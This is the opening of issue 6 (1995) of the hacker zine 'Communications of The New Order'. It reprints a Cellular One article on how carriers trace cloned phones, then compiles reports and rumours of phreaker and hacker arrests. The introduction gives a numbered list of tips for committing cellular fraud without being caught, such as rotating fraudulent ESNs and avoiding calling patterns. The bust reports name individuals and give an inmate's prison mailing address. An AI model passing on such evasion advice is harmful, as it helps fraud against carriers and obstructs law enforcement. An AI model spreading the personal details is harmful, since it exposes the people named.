3578 lines
167 KiB
Plaintext
3578 lines
167 KiB
Plaintext
______ ______ _____________ ____ ___ ______
|
||
/ ____|\ / \ /____ ____/\ / | \ / / | / \
|
||
/ / ____\| / __ |\ \_/ /\____\/ / | / / / / __ |\
|
||
/ / / / /__/ / | / / / / /| |/ / / / /__/ / |
|
||
/ /__/______ | / / / / / / / | / / | / /
|
||
|____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / /
|
||
|_____________\| \|____| / \__\ / |___ |/ |___|/ \|____| /
|
||
|
||
____
|
||
/ \ ---
|
||
/ \ \ __
|
||
/ /\ \ \ \
|
||
_/______|_/ / / / \
|
||
| | / / / /
|
||
| ---\( |/ / / /
|
||
| \|\(/ \(/\(/
|
||
| |
|
||
/ /
|
||
/ \ /
|
||
/ \ ___/
|
||
/
|
||
/
|
||
/
|
||
|
||
Communications of The New Order
|
||
Issue #6
|
||
Fall 1995
|
||
|
||
|
||
"There is nothing more difficult to take in and, more perilous
|
||
to conduct, or more uncertain in its success, than to take the
|
||
lead in a new order of things."
|
||
|
||
- Niccolo Machiavelli'
|
||
|
||
|
||
Cavalier........"I hacked codes to get warez for free drugs."
|
||
Dead Kat........"I have non-hacker friends but fuck if I keep in
|
||
contact with them, they don't have k0d3z."
|
||
Disorder........"US West knew we were getting their stuff, they
|
||
just didn't know we were on the deferred payment
|
||
plan."
|
||
Edison.........."I said fuck you cop.. well I wish I had said that."
|
||
Major..........."SUNOS... the swiss cheese of unix."
|
||
Voyager........."I don't think money is as powerful as fear, but
|
||
I have a day job."
|
||
|
||
|
||
|
||
|
||
Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence,
|
||
Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
|
||
Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne,
|
||
Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
|
||
Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
|
||
|
||
Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
|
||
Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson,
|
||
BernieS, Kevin Mitnick, Alphabits.
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
__/\iNTRo/\__
|
||
|
||
|
||
CoTNo is a 'zine of the computer underground of the 1990's. It is written
|
||
for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All
|
||
the information published herein is as accurate as possible and pertains to
|
||
techniques and devices that actually work. We do not publish any article
|
||
that is not of an H/P nature. If you wish to comment on or contribute to
|
||
CoTNo, email one of us, or catch one of us on the iRC or try to catch
|
||
us in your local Telco dumpster.
|
||
|
||
Ahem...
|
||
|
||
This issue is dedicated to all of our good friends who have recently been
|
||
busted. In fact, the last three issues are dedicated to them, since there
|
||
have been more people busted in the last twelve months then at any time since
|
||
Sundevil. In issue four I espoused my opinion that there was a federal
|
||
conspiracy at work with paid informants masquerading as our friends. Last
|
||
issue I gave detailed information on one of our own busted members, John
|
||
Falcon. In this issue there will be information you can use to help keep
|
||
yourself out of jail.
|
||
|
||
In this issue, Disorder has compiled detailed information on the busts of
|
||
lasts twelve months. Each bust that we heard of is detailed with names and
|
||
events. Hindsight is always clearer than foresight, so hopefully you can
|
||
learn from these busts how to avoid a similar fate. Also in this issue, I
|
||
am releasing confidential information on how cellular fraud is prevented.
|
||
The information is straight from a national cellular carrier and details
|
||
exactly how the telcos detect, trace, and bust cellular abuse. This
|
||
information should convince you to take the utmost precautions if you are
|
||
experimenting with cellular technology. Lastly, John Falcon sent me an
|
||
article on what to do if you do get busted. I think this is the first H/P
|
||
article ever written from jail!
|
||
|
||
The following information was an actual article from Cellular One that was
|
||
distributed to some of their employees. This article was not edited in
|
||
anyway, and contains the best information I have ever seen on how cellular
|
||
fraud is prevented. If you are participating in cellular phreaking, I
|
||
recommend that you read this article very closely and take it as a warning
|
||
from the Cellular Telephone industry. They are getting serious about halting
|
||
cellular fraud, and for good reason. In New York for instance, often
|
||
there are more fraudulent cellular calls than legitimate ones on any given
|
||
day! The Fedz are on their side too. As you may already know, the Fedz ran
|
||
an underground BBS for 8 months this year just to catch Cellular Fraudsters.
|
||
In fact, Kevin Mitnick was recently busted using the same methods described
|
||
in the following article.
|
||
|
||
The article, dated February 1995, follows:
|
||
|
||
A team of five Cellular One employees helped stop cellular fraud in Denver
|
||
last week. To protect both our employees and future investigations,
|
||
Cellular One team members names will not be released.
|
||
|
||
California officials tracked a suspect from the Los Angeles area using a
|
||
cloned cellular phone to Denver early last week and asked Cellular One for
|
||
assistance in locating this suspect. With the cloned cellular phone number
|
||
and a number the suspect repeatedly called in California, the five Cellular
|
||
One employees and both local and California law enforcement agents began
|
||
tracking the whereabouts of the suspect through the pattern of his cellular
|
||
phone calls.
|
||
|
||
Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an
|
||
RSAT Plus, and hours of labor, the Cellular One team identified the suspect's
|
||
calling patterns. An AMA search is a record of an individual cellular
|
||
phone number's calls. The cellular number is input along with the
|
||
parameters for the search - start and finish date and time - and a log is
|
||
printed which shows each individual call made by that cellular number.
|
||
This tool is used generally within three days of the calls which you wish
|
||
to observe. AMA searches were compiled over several days to document the
|
||
calling patterns of the suspect.
|
||
|
||
While the AMA searches show the past calling pattern, when attempting to
|
||
capture a cellular fraud suspect, real time tools must also be used. The
|
||
Cellular One team used RFCALL Trace which tracks similar information as an
|
||
AMA record with the exception that the information can be collected with
|
||
only a 10 second delay from real time. RFCALL Trace also tracks the
|
||
individual radio in use, any handoffs, and the signal strength of
|
||
the cellular call. Law enforcement agents issued a subpoena to Cellular One
|
||
for all information regarding the fraudulent cellular phone number's
|
||
activity on our system.
|
||
|
||
Most of the fraudulent phone calls were being placed between 10am and
|
||
midnight. Tracking which cell sites, cell faces, and radios the suspect's
|
||
calls set up on identified a small geographical area as the suspect's base of
|
||
action. Once an area had been established, one team member drove this area
|
||
using an RSAT Plus, an IFR 1500, and a directional antenna (all basic
|
||
cellular test equipment used in system optimization) to pinpoint the suspect's
|
||
location to a specific apartment complex. This team me tracked the calls
|
||
made by the suspects's cellular number and, watching the faces serving the
|
||
calls and he handoffs made by the system during the suspect's calls, he was
|
||
able to narrow down the location from which the calls were made to a specific
|
||
side of one apartment building.
|
||
|
||
The law enforcement agents, equipped with their own brand of cellular fraud-
|
||
busting tools, asked if the Cellular One team could identify the actual
|
||
apartment within the building where the calls were being placed. A narrowband
|
||
directional antenna was set to the transmit frequency of the cloned phone.
|
||
One problem was that with each new phone call, the frequency being tracked
|
||
changed. The suspect made short calls, most around one minute, with the
|
||
longest between three to five minutes. Using the directional antenna
|
||
and resetting the frequency with each new call on the cloned phone, the
|
||
Cellular One employee identified a group of apartments within the building
|
||
from which the cellular calls were being placed.
|
||
|
||
Unfortunately, the suspect slipped out of the building before the specific
|
||
apartment was identified. Again using RFCALL Trace, the Cellular One team
|
||
logged the suspect's next phone call on a cell site near Stapleton
|
||
Airport. Law enforcement was notified and kept aware of the phone calls as
|
||
the suspect traveled throughout the system. It became evident that the
|
||
suspect was moving back toward the apartment complex. Surveillance
|
||
officers outside the apartment noticed three men enter just moments before
|
||
the Cellular One team notified them that a call had been placed from the
|
||
apartment. Within 20 minutes, the suspects again left the apartment.
|
||
Denver Police began pursuit of the suspect and made the arrest. Five
|
||
additional cellular phones were found in the suspect's apartment. It has
|
||
not been determined if these phones are cloned.
|
||
|
||
Although cellular fraud exists, it is possible to catch the criminals.
|
||
Congratulations to our fraud busters! Cellular One asks that you keep this
|
||
story confidential since the specifics of this and future investigations
|
||
depend on our ability to catch the criminals in action.
|
||
|
||
End of Cellular One Article.
|
||
|
||
Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but
|
||
times have changed. The cellular phone companies are losing so much money on
|
||
cellular fraud, that they have made busting the cellular hackers a priority.
|
||
If you do commit cellular fraud, I suggest you use the following guidelines:
|
||
|
||
1. Never use the fraudulent ESN for over two weeks.
|
||
2. Change ESN's as often as possible.
|
||
3. Avoid creating a calling pattern with your fraudulent ESN.
|
||
4. Avoid using the fraudulent ESN from a stationary location.
|
||
|
||
These tips could keep you out of jail! Because you cannot divert with a
|
||
cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
|
||
As my friend John Falcon told me, "Its not worth doing time for silly phone
|
||
shit." He's right. H/P is fun, but anyone who has gotten busted will tell
|
||
you the same.
|
||
|
||
But if despite these warnings, you still decide to cellular phreak, just make
|
||
this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
|
||
|
||
|>ead|<at
|
||
-=(TNo)=-
|
||
|
||
|
||
Table of Contents
|
||
~~~~~~~~~~~~~~~~~
|
||
Introduction......................................Dead Kat
|
||
Operation Phundevil...............................Disorder
|
||
What Happens When You Get Caught..................John Falcon
|
||
Legal and Technical Aspects of RF Monitoring......Major
|
||
The Tao of 1AESS..................................Dead Kat & Disorder
|
||
Frequently Visited AT&T Locations.................Major & Dead Kat
|
||
Remote Hacking in Unix............................Voyager
|
||
The Definity Audix VMS Inside Out.................Boba Fett
|
||
Bridging the Gap..................................Eddie Van Halen
|
||
Elite Music Part V................................Disk Jockey
|
||
Conclusion........................................Dead Kat
|
||
|
||
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
-= Operation Phundevil =-
|
||
|
||
by DisordeR[TNo]
|
||
|
||
|
||
With all the busts happening in the past year, and a lack of
|
||
information in the scene regarding who got busted when, and for what,
|
||
I decided to put this article together. After working on this for a
|
||
while, I realized that not only was it a little difficult in finding
|
||
bust info, but half of the little you found was bullshit.
|
||
|
||
The information in the following article is as accurate as I
|
||
can find. With all the different accounts of what happened, different
|
||
nicknames, different NPA's, and pure stupidity out there, don't bet your
|
||
life on the information contained within this article.
|
||
|
||
The following sections give you some details about some busts,
|
||
and RUMORS of others. I indicate which are rumors and which are legit.
|
||
I utilized everything from BBS posts, to newspaper articles, to word
|
||
of mouth. Thanks to those who helped me on this. And by no means is this
|
||
NEAR complete...
|
||
|
||
=-=
|
||
|
||
"OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0"
|
||
|
||
Main Thugs:
|
||
Peter A. Cavicchia II - Special Agent in Charge
|
||
Donna Krappa - Assistant U.S. Attorney in Newark
|
||
Stacey Bauerschmidt - "Carder One"
|
||
|
||
The Busted:
|
||
Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
|
||
into the Portland, Oregon AT&T Wireless computers.
|
||
Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break
|
||
into the Portland, Oregon AT&T Wireless computers.
|
||
Watkins used the computer system of Embry Riddle University in
|
||
Prescott, Ariz., to enter the McCaw computer, Secret Service
|
||
Special Agent Stacey Bauerschmidt said in a sworn statement.
|
||
Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
|
||
of trafficking in cloned cellular phones/equipment and stolen
|
||
access devices (ESN/MIN Pairs).
|
||
Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
|
||
stolen access devices.
|
||
Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
|
||
unauthorized access devices.
|
||
Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
|
||
and trafficking in hardware used to obtain unauthorized access to
|
||
telecommunications services.
|
||
|
||
Penalty:
|
||
If convicted, defendants face maximum possible sentences ranging
|
||
from 15 years for Cushing to 10 years for Bradford, Clarkson and
|
||
Natoli and five years for Lacap and Watkins.
|
||
|
||
Details:
|
||
Starting in January, Stacey Bauerschmidt and other Secret Service
|
||
agents in Newark, NJ, set up what is now called "an electronic chop shop"
|
||
by the press. Stacey (in cooperation with a 'nameless informer' who will
|
||
be mentioned later) set up a computer BBS called "Celco 51" with the
|
||
intent of busting hackers and phreakers specializing in cellular phone
|
||
fraud.
|
||
For the first sixth months, the board operated using MBBS with
|
||
four nodes. At any given time the board had an 800 re-route (not really)
|
||
so that the users could call without any problem (ANI). To the credit of
|
||
the agents in charge, the board did not allow just anyone access. The sysop
|
||
(PMF) appeared to discriminate and only allow the 'elite' members of the
|
||
H/P community on. With the illusion of security, the agents running the
|
||
board could successfully monitor the users, and begin to make deals with
|
||
the hackers.
|
||
Stacey [Who went by 'Carder One'] continually asked members of the
|
||
BBS if they were interested in selling ESN/MIN pairs [Used for cellular
|
||
phone fraud]. These 'pairs' are considered 'illegal access devices' and
|
||
are usually found in large enough amounts to consist of felonies. On top
|
||
of the illegal access devices, Stacey was looking for people that were
|
||
willing to sell illegal cloning equipment. This equipment consisted of
|
||
devices used to get pairs, clone phones, and reprogram phones.
|
||
The operation was very successful in many ways, notably the ability
|
||
of the agents to mask the true nature of the board. For over eight months,
|
||
Stacey and other agents monitored the board looking for any chance to
|
||
prosecute any of the members. The sysop (PMF) continuously advertised the
|
||
board to the members, as well as mailed and HARASSED members into calling
|
||
more than they wished to (Entrapment anyone?). PMF was responsible for
|
||
mailing members up to three times a day, message flooding people on IRC,
|
||
and using other methods of harassment to get hackers to call.
|
||
On top of the harassment, Carder One continuously asked for people
|
||
to post 'pairs' as well as sell them in private. In a few cases, individuals
|
||
would not have considered selling these pairs had the federal agents not
|
||
harassed them so much. Ahem.
|
||
|
||
"Cushing and five others were arrested in four states during a
|
||
sweep last week by federal agents. Another 14 raids spread over eight
|
||
states led to the confiscation of 31 computers, 65 illegally programmed
|
||
phones and 14 "readers," devices used to illegally pluck cellular phone
|
||
numbers and serial codes from cellular phone transmissions."
|
||
[Wonder who's computer will run the next sting board?]
|
||
|
||
"But because the alleged crooks posted phone numbers on the bulletin
|
||
board indicating where they could be reached, the Secret Service was able to
|
||
trace the calls, leading to the arrests."
|
||
[Need we emphasize the importance of Diverting any more?]
|
||
|
||
"But officials said this case represented the first time that the
|
||
Secret Service had created an entirely new computer bulletin board..."
|
||
[Couldn't bust any warez kiddies recently...]
|
||
|
||
[Watch out kiddies... They are using more than 'questionable' methods
|
||
of busting hackers and phreaks these days. If you haven't met someone,
|
||
be careful of what you post on their systems.. many people thought
|
||
PMF was cool until he NARKED on everyone that he could.]
|
||
|
||
=-=
|
||
|
||
"ANARCHIST BUSTED FOR WRITING MAGAZINE"
|
||
|
||
From: The Anarchives <tao@presence.lglobal.com>
|
||
|
||
In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
|
||
|
||
Three large, white, plain-clothes detectives from 52 division in downtown
|
||
toronto came to my house, promptly arrested me, took me to a holding
|
||
cell, and conducted a strip search (looking for codes I guess). I was
|
||
held in custody for four hours (7:30 pm to 11:30 pm), and released as a
|
||
result of substantial protest made by friends and family at the sergeants
|
||
desk.
|
||
|
||
I was being accused of breaking into the computer systems at the
|
||
University Of Toronto for the purpose of publishing "Anarchist
|
||
newsletters".
|
||
|
||
The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
|
||
<gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
|
||
materials, assumed I was a malicious "hacker", turned over all records of
|
||
my email, news posts, key strokes, you name it, to the police at 52
|
||
division. The police realizing how dangerous these "hacker anarchist"
|
||
types are, had to come to my house to cuff me, bring me down, and strip
|
||
search me.
|
||
|
||
I was to face trial for a possible six months in prison, just for
|
||
exercising my democratic rights and responsibilities.
|
||
|
||
Of course the end result was that the charges were dropped, although this
|
||
was not until several months later (sept 7, 95), after several
|
||
appearances in court, and after my agreeing to pay $400 to the skule.
|
||
|
||
=-=
|
||
|
||
"FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
|
||
by, Denny Walsh
|
||
|
||
From: The Sacramento Bee
|
||
Saturday Sept. 16, 1995
|
||
|
||
Two talented Berkeley hackers were charged Friday with computer-
|
||
age crimes against a Tower Video rental store in Sacramento, federal
|
||
authorities said, in large part because they went up against Tower's even
|
||
more talented electronic security corps.
|
||
|
||
When authorities raided their apartment last month, Terry Patrick Ewing,
|
||
21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
|
||
customers, federal prosecutors said.
|
||
|
||
According to a federal grand jury indictment, Ewing and Kim used
|
||
their personal computer to break into a system know as TRON, owned and
|
||
operated by Tower's West Sacramento-based parent, MTS Inc.
|
||
|
||
Kim and Ewing are charged in a three-count indictment with
|
||
conspiracy, fraud and the unauthorized destruction of computer data.
|
||
|
||
The prosecutor said the pair are not in custody and will be
|
||
allowed to surrender next week. He said he does not see them as flight
|
||
risks.
|
||
|
||
=-=
|
||
|
||
"KEVIN MITNICK BUST - HIGHLIGHTS"
|
||
|
||
From Multiple Sources
|
||
|
||
If you want more details, read the hundreds of articles about this story.
|
||
Also, read the Phrack 47 editorial pertaining to this subject.
|
||
|
||
Kevin Mitnick (31)
|
||
-One of the first indicted under Computer Security Act of 1987
|
||
-Search began in November 1992
|
||
-Mark Seiden (expert in firewalls) discovered that someone had obtained
|
||
all of Netcom's credit card numbers for 20,000 online subscribers.
|
||
-Stole files from: Motorola, Apple, Netcom, and more.
|
||
-Mitnick used the Well as a repository for files he stole from computer
|
||
security expert Tsutoma Shimomura.
|
||
-After raping Tsutoma, he used Bruce Koball's account to transfer
|
||
proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
|
||
and other cell manufacturers.
|
||
-Shimomura concluded that it was Mitnick, and that he was operating
|
||
through cellular, from Raleigh, NC
|
||
-Mitnick was bouncing his calls through GTE Switches, local switches,
|
||
and a few types of cellular switches, and utilized Netcom's dialins.
|
||
-Lived in Player's Court, a 12-unit apartment building in suburb of
|
||
Duraliegh Hills, three miles from the airport. He lived in Apt 202.
|
||
-Until a week or two before he was arrested, FBI surveillance agents in
|
||
Los Angeles were certain that 'the intruder' was somewhere in Colorado.
|
||
-FBI arrested him at 24 hour stakeout
|
||
-Arrested in Raleigh, N.C. at 1:30 a.m.
|
||
|
||
=-=
|
||
|
||
"PHREAKS BUSTED IN NY... MORE TO COME"
|
||
|
||
"Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
|
||
of you prolly haven't heard yet, but there have been major busts going around.
|
||
... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire
|
||
have been busted. ... that they even busted craig neidorf(knight lightnig)
|
||
again.
|
||
|
||
More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
|
||
calling. The SS who raided hellfire slipped a bit and bragged about being on
|
||
those boards.
|
||
|
||
Hellfire said the feds were mostly interested in credit cards,
|
||
VMB's, and Cell phones.
|
||
|
||
They are looking to bust for cellular, VMB's and credit cards...
|
||
|
||
Tokien entry i found out has been in jail for 2 days!
|
||
Neon Samurai was busted for credit cards and also for telco equipment that
|
||
the nynex people said was worth 50,000. "
|
||
|
||
|
||
PMFs (Narc) reply:
|
||
|
||
"dude, this is utter shit and i expect u to post this reply for me seeing
|
||
as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs
|
||
among others, he was the only person busted and nothing to do with his
|
||
busts was EVER mentioned on my board. He doesn't even get involved in
|
||
cellphones, he was busted coz he and every other person busted used
|
||
1 800 CALL ATT from his house.. what a bunch of lamers... I don't even
|
||
know who wrote that next but i would like to find out.. probably the guys
|
||
from NYHE..."
|
||
[Ironic isn't it!]
|
||
|
||
=-=
|
||
|
||
"ALPHABITS ORIGINAL BUST LAST YEAR"
|
||
|
||
Caught alphabits on irc lastnight and he said:
|
||
|
||
<alphabits> but I got sent to prison 7 months ago, and lost contact ***
|
||
|
||
According to different people, he was busted for check fraud and/or credit
|
||
fraud and/or cellular fraud. Unfortunately, I will not be able to talk
|
||
to him until after this article.
|
||
|
||
=-=
|
||
|
||
"SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
|
||
|
||
From another group member:
|
||
|
||
Syncomm was talking on the phone.. the day before Master of Reality got
|
||
busted... so MOR, Greg and equinox were sitting there chatting away when
|
||
a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs>
|
||
and some local police busted down his door. He dropped the phone and all
|
||
they heard was a rustle of papers .. then a "Secure that paper!" then a
|
||
click.. They put a shotgun to his head and said "Hello Syncomm". They
|
||
said he was the leader of S.O.B. an international terrorist organization.
|
||
Then again they thought that Crypt Keeper and MOR were also the sole
|
||
leader of SOB ... So then they put a knee to his back and handcuffed him
|
||
<Greg, 16, apparently posed a serious threat>. They proceeded to
|
||
interrogate.. and at one point this one agent <female> tried to seduce him
|
||
into talking <I think he would of he she did more .. ;)> ..
|
||
|
||
He was finaly was lead outside when his neighbor walked up to them and
|
||
handed them all of Greg's notes, etc.. that greg had asked him to stash..
|
||
Greg then threatened his neighbors life.. <which he came back to do
|
||
unhandcuffed afterwards> and was led off to holding... were they produced
|
||
"A big fucking printout" that apparently detailed Greg's activities.. they
|
||
nailed him for hacking UC and then accused him of crashing their
|
||
systems.. Along with criminal tools <his computer> and some other
|
||
offenses.. <one of which I am sure of is Wire Fraud.. they love that>
|
||
|
||
=-=
|
||
|
||
"FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
|
||
|
||
SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
|
||
that has software companies upset to see piracy extending
|
||
into the CD-ROM format.
|
||
|
||
From the Associated Press, Saturday Dec 24 1994
|
||
|
||
BUFFALO, New York - The FBI has arrested a Canadian father and son in what
|
||
is believed to be the first major case of CD-ROM piracy in the United States.
|
||
|
||
Agents said Thursday they seized 15,000 counterfeit copies of the popular
|
||
CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail
|
||
value.
|
||
|
||
PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
|
||
CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
|
||
ment. The counterfeit goods were recovered in a Niagara Country warehouse
|
||
authorities said.
|
||
|
||
The FBI told the Los Angeles Times that additional warrants were served in
|
||
INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
|
||
the illegal software. MORE ARRESTS ARE EXPECTED.
|
||
|
||
=-=
|
||
|
||
"MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
|
||
|
||
TORONTO - Canadian, US and European investigators
|
||
have cracked a ring of computer hackers who allegedly
|
||
stole about $5 million US$ by breaking into the
|
||
computers of phone companies and other firms.
|
||
|
||
The 12 hackers who met over the Internet, used coding
|
||
and call switching to conceal the transfer of funds,
|
||
codes and communications.
|
||
|
||
RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
|
||
GUILTY on Tuesday, June 27 1995. He got 90 days in
|
||
Jail and 100 hours of community services for HELPING
|
||
the RCMP with their investigation - instead of at least
|
||
a one year jail sentence.
|
||
|
||
=-=
|
||
|
||
"RUMORS FROM 914"
|
||
|
||
There has been a huge chain of busts in 914. Apparently, GANGSTER,
|
||
who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
|
||
goes on to say that he was 'fucking around with CC's' which led to the
|
||
bust.
|
||
|
||
=-=
|
||
|
||
"WAREZ BUSTS IN 510"
|
||
|
||
The Sewer Line BBS in 510 met trouble on December 11th due to the
|
||
distribution of console warez (from various posts). Rumor also has it,
|
||
that a user on the board going by ROCK'N was in fact a sega representative,
|
||
and narked on the sysop for his activities.
|
||
|
||
=-=
|
||
|
||
"214 BUSTS"
|
||
|
||
During August of '94, several boards (mostly warez/ansi affiliated)
|
||
were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
|
||
area, the list follows:
|
||
Agents of Fortune [409] (Sysop: Butcher [LEGEND])
|
||
Suburbia [214] (Sysop: The Chairman [RZR],
|
||
The Network [214] (Sysop: Masterblaster)
|
||
The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE])
|
||
Elm Street [214] (Sysop: Freddy Krueger)
|
||
User to User [214] (Sysop: William Pendergast)
|
||
|
||
=-=
|
||
|
||
"PHILLY 2600 MEETING"
|
||
|
||
From recent posts and word of mouth, the Philadelphia 2600 meetings are
|
||
having a hard time making it past 5 minutes. Apparently, local police in
|
||
coordination with mall rent-a-cops [joining of forces there], are kicking
|
||
hackers and phreakers out of their meeting place based on charges of
|
||
loitering and conspiracy [to do what?! Assemble?]. Currently, police
|
||
are threatening to break up meetings, and/or jail participants for the
|
||
two reasons cited above.
|
||
|
||
=-=
|
||
|
||
"FEDZ BUST KID IN MINNESOTA"
|
||
|
||
November '94, a 15 year old in Minnesota had a pleasant visit by
|
||
federal agents. According to newspaper articles, the boy [unnamed
|
||
in the article] was basing his hacks out of the Detroit Free-Net.
|
||
"He used passwords to gain access to more than 10 computer networks
|
||
from Detroit to Moscow". During his time on the Detroit Free-Net,
|
||
he was said to have maliciously disabled enough of the system 'forcing'
|
||
it to shut down.
|
||
Currently, the boy is facing potential charges for using
|
||
telecommunications devices to cross state lines, and felony charges
|
||
for breaking into computer systems.
|
||
|
||
Other favorite quotes from the articles about this case:
|
||
"...hospitalized, possibly for psychological reasons, when police
|
||
confiscated his computer modem and software programs Monday."
|
||
|
||
"...said the boy appeared to fit the typical hacker profile: a
|
||
15- to 20-year-old male, many who have low self-esteem. 'He really
|
||
could use a girlfriend instead of a computer' Grewe said."
|
||
|
||
=-=
|
||
|
||
"THE TROUBLES OF BERNIE S."
|
||
|
||
Recently, a lot of press has been covering the story of 'Bernie S'.
|
||
You can find more info about his bust on alt.2600 as well as several
|
||
'hacker' mailing lists. Here are some of the interesting quotes from
|
||
one of those articles:
|
||
|
||
"Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
|
||
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
|
||
of a device to commit Telecommunications fraud charges. He is being held in
|
||
Delaware County Prison in lieu of $100,000.00 Bail."
|
||
His arrest took place at a local 7-11 where *15* police cars pulled
|
||
into the parking lot. During the interaction with the officer, he told
|
||
them 'no, you can't search my car', yet minutes later, he noticed
|
||
an officer going through the contents of his car. Despite his protests,
|
||
the officer removed several timing crystals, tone dialers, and a 'broken
|
||
red box'.
|
||
The following day, Bernie was at a friend's house when '8 to 10' plain
|
||
clothed armed men burst into the house yelling 'freeze'. Minutes later
|
||
he was being taken to jail in cuffs. He was not formally charged until
|
||
his arraignment where his bail was set to 100,000 dollars because he
|
||
refused to talk with the police without counsel present.
|
||
"The Judge dropped the two unlawful use of a computer charges due to
|
||
the fact that the evidence was circumstantial and the county had no actual
|
||
evidence that Ed had ever used the computers in question. As of 3/27/1995
|
||
Ed Cummings is still in Delaware County Prison awaiting his trial."
|
||
|
||
=-=
|
||
|
||
"RUSSIANS ARREST 6 IN COMPUTER THEFTS"
|
||
|
||
This article was taken from the Associated Press, Saturday Dec 24 1994
|
||
|
||
St. Petersburg, Russia, Sept 26 (AP) -- Russian police
|
||
officers have arrested six more people in a $10 million
|
||
computer theft from Citibank here, but the masterminds are
|
||
said to remain at large.
|
||
|
||
Several people have been arrested abroad and face charges
|
||
in the United States, including Vladimir Levin, 28,
|
||
reportedly the group's computer hacker.
|
||
|
||
Citibank officials said they recovered all but $400,000 and
|
||
upgraded the cash-management systems's electronic security
|
||
after the theft.
|
||
|
||
|
||
FT, Sept 21, 1995.
|
||
|
||
Extradition in Citibank hacking case
|
||
|
||
A British court yesterday approved the extradition to the
|
||
US of Mr Vladimir Levin, the Russian science graduate
|
||
accused of an attempted $10m (6.5m pounds) computer hacking
|
||
fraud on Citibank. ...
|
||
|
||
=-=
|
||
|
||
"PURPLE CONDOM CAUSES TROUBLE"
|
||
|
||
Purpcon recently had pleasant meetings with his Dean where he attends
|
||
college after getting caught rewriting his magnetic student ID, so
|
||
that others would get charged for his meal. :)
|
||
|
||
=-=
|
||
|
||
"CoTNo RUMORS"
|
||
|
||
In past issues of CoTNo we have always said 'good luck to' people
|
||
that have been busted (or said to have been busted)..
|
||
|
||
Deathstar, AntiChrist (school admins?), Coaxial Mayhem,
|
||
Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
|
||
Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
|
||
CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
|
||
|
||
At the request of some of the above, I can't go into details on their busts.
|
||
|
||
=-=
|
||
|
||
"JOHN FALCON BUSTS"
|
||
|
||
Since rumors about his bust have been running rampant on the 'Net',
|
||
here are the facts about the bust... for more info, and JF's reply
|
||
to the rumors, read CoTNo 5.
|
||
|
||
Common myths of my arrest:
|
||
|
||
1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
|
||
2 - Mr. Falcon left his secring.pgp on his system.
|
||
3 - FBI/NSA read the RSA encrypted data.
|
||
4 - My conviction was because I was a hacker.
|
||
|
||
Let me go over my conviction:
|
||
|
||
Count 1: Theft of Government Property - How they caught me: Narc
|
||
Count 2: Fraudulent use of an Access Device - How they caught me: Narc
|
||
Count 3: Fraudulent use of a Computer - How they caught me: questionable
|
||
Count 4: Fraudulent use of an Access Device - How they caught me: Narc
|
||
|
||
If you would like to get in contact with JF, here is his info:
|
||
email: jfalcon@ice_bbs.alaska.net
|
||
snailmail: Don Fanning
|
||
#12617-006
|
||
3600 Guard Road
|
||
Lompoc, CA 93436
|
||
|
||
|
||
=-=
|
||
|
||
"EPSILON, DAMIEN, SHOCKWAVE (303)"
|
||
|
||
From CoTNo 3 (Read there for full story)
|
||
|
||
Three Colorado teen-agers are suspected of setting up an elaborate computer-
|
||
hacking system that tapped into a long-distance telephone company and stole
|
||
secret access codes (k0dez!).
|
||
|
||
Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
|
||
Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
|
||
County in the alleged scheme.
|
||
